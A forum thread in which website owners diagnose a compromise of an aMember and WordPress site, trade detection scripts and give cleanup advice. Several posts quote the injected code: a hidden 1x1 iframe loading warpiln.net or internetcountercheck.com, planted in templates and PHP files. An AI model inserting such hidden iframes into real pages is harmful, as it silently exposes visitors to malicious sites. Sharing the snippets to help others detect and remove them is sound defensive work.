Hi All, I'm hoping someone can help me. Whenever the user enters their personal info (signup.php) and clicks continue, for some reason when the user is on the cc.php (amember/plugins/payment/cc_core/cc.php) page, the page redirects to some other URL. It's not always the same site, it seems to be a different site every time. Has anyone else run into this problem?? Fixes?? BTW, I have added the latest SecurityNote06 in the code. TIA, - Jes
Found something interesting on the cc.php, on the very first line, when you view the source: <iframe src="http://warpiln.net/?click=803E91" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> Any clues of how to remove this?? This is something I did NOT implement myself. Any help is greatly appreciated.
Update: I found the iframe code in the footer.html page in the amember/templates folder. <iframe src="http://warpiln.net/?click=803E91" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> I removed it and FTP back over. I still, however, see it being referenced when looking at the source on the cc.php page. I ftp'd all of the amember/template files onto my local machine. I used notepad++ to Search in Files to detect "iframe src="http://warpiln", but it did not find any further references from any files within the template folder. Any ideas anyone? I have submitted a ticket for this, but any help would be greatly appreciated. - Jes
Thanks for the info David! I am running a virus check on my computer. I will inform GoDaddy of the issue as well. Thanks, - Jes
Once your virus scan is complete you should consider changing all of your various passwords as well (especially your FTP, CPanel, etc)
Hello, <b>I am in dire straits!!</b> I have contacted GoDaddy and reported the issue. Their Advanced support response is that "my FTP credentials have been compromised and to change my passwords". That has been done. GoDaddy cannot confirm with me that their site has been hit with this virus or that they have checked on their servers at all, and has put the earnest on me to figure this issue out. I have FTPd locally ALL files contained on my domain. I have used Notepad++ to search every single line of code for ALL files from my domain (Search > Find in Files...). I cannot find ANY reference to this IFRAME issue within them. I cannot figure out what else to do! I am at my wits end! This is very critical to get this resolved in order for me to go live with my site. I am at the point where I am willing to pay someone to help me fix/resolve this issue! Can someone help me? Thanks, -Jes
Jes, I can help you get this sorted server side (free of charge). Drop me an email [my username here @ hotmail.com]
FYI, for those that run into this issue.. among the other reported places, it tries to hide itself in: \amember\smarty\plugins\modifier.default.php Either edit out the change or revert back to the stock version.
Thank you! First off, I cannot begin to thank Skippy enough! You are a blessing my friend! Thanks for your help! Here is a list of the files that were infected in my site: Code: ../wp-admin/index.phpiframe src=\"http://warpiln.net/?click=859E9A\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"; ../amember/plugins/protect_trial/event_registration/index.phpiframe src=\"http://warpiln.net/?click=513A7E\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"; iframe src=\"http://internetcountercheck.com/?click=2539171\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"; ../amember/plugins/protect_trial/incremental_content/index.phpiframe src=\"http://warpiln.net/?click=6EA33E\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"; ../amember/plugins/protect_trial/memberslist/index.phpiframe src=\"http://warpiln.net/?click=70E946\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"; ../amember/xmlrpc/index.phpiframe src=\"http://warpiln.net/?click=8268A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"; ../amember/plugins/protect_trial/memberslist/templates/memberslist/index.htmliframe src="http://warpiln.net/?click=716711" width=1 height=1 style="visibility:hidden;position:absolute"> ../amember/smarty/plugins/modifier.default.php file I am attaching a script that can be used to detect the Iframe tag within the files, with the exception of the "/amember/smarty/plugins/modifier.default.php" reference. Usage: http://www.yourdomain.com/find.php?s=index.php&c=iframe http://www.voteonmesports.com/find.php?s=index.html&c=iframe Change s= or c= as needed. Please check your sites, as Google is systematically marking the pages as Unsafe. I found someone offering a script to help remove the references in your files (although it did not find it in the modifier.defaul.php file). http://www.yourjoomlapro.com/ Instructions and files are available on that site. I just want to say thanks again to Skippy again, and I hope that this information can be of benefit to someone. - Jes
Thanks for the replies guys, found this on Google as I am experiencing the same problems. I ran that find.php and its found a few more instances of iframes I didn't realise I had. I've cleaned them all now. I'm more worried how I got this in the first place. I've removed the iframes and changed my ftp, amember, and wordpress passwords. Any suggestions as to how we got infected, or how to protect against it again? thanks ________ easyvape vaporizer
@starstruck: either your computer, your FTP account or your server was compromised. 1) Computer: Scan with antivirus / malware any computers you have accessed your administrative side of your site from 2) FTP: change your FTP account info 3) Server: Contact your host. Also have you uploaded any sketchy scripts to your server that may have an unwanted "payload".. I had a client that was using a copy of vBulletin he got from ThePirateBay that resulted in all of the scripts on his site being infected in a similar way. Unless you have security locked down, PHP code executed on your server can modify other scripts on your server.